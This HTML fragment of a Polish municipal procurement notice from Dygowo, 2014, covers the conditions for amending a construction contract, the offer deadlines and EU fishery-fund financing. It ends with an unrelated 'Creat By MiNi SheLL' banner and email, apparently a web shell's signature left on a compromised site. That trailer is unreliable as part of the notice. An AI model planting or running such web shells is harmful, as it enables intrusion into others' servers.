<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Strony nie przewidywały w chwili zawierania Umowy. Okoliczności te nie mogą być wywołane przez którąkolwiek ze Stron, ani nie mogą być przez Strony zawinione i muszą wywoływać ten skutek, iż Umowa nie może być wykonana wedle pierwotnej treści lub niemożność osiągnięcia celu Umowy. Okoliczności powyższe odnosić się mogą w szczególności do:
wystąpienia zmian stanu prawnego, w tym w szczególności przepisów podatkowych i z zakresu ochrony środowiska,
działań i zaniechań organów władzy publicznej, w tym zmiany urzędowych interpretacji przepisów dot. realizacji i finansowania Przedmiotu Umowy,
działań i zaniechań instytucji zaangażowanych w realizację, kontrolę lub finansowanie zamówienia,
gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej,  
powszechnej niedostępności surowców bądź materiałów,
konieczności uwzględnienia wpływu ewentualnych prac dodatkowych 
i zamiennych na realizację przedmiotu umowy, 
konieczności uwzględnienia wpływu ewentualnego zaniechania części prac objętych umową, 
przedłużającą się procedurą przetargową,
warunków atmosferycznych i klimatycznych uniemożliwiających realizację Przedmiotu Umowy w stopniu większym niż można byłoby to racjonalnie przewidywać,
klęsk żywiołowych i ekologicznych oraz siły wyższej,
nieprzewidywalnych warunków gruntowych (w tym w szczególności kolizji z sieciami i obiektami podziemnymi nieujętymi na mapach zasadniczych z państwowego zasobu geodezyjno - kartograficznego, warunków geologicznych nieopisanych w dokumentacji projektowej, których nie dało się przewidzieć pomimo dochowania należytej staranności)
opóźnienia w przekazaniu placu budowy prze Zamawiającego,
zmiany w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub 
zmiany obowiązujących przepisów prawa,
zmiany zakresu robót powierzonego podwykonawcom</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dygowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dygowo, ul. Kolejowa 1, 78-113 Dygowo, pokój nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2014 godzina 10:00, miejsce: Urząd Gminy Dygowo, ul. Kolejowa 1, 78-113 Dygowo, pokój nr 8 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot umowy jest realizowany w ramach środków pochodzących z Programu Operacyjnego Zrównoważony  rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 w ramach środka 4.1. Rozwój obszarów zależnych od rybactwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com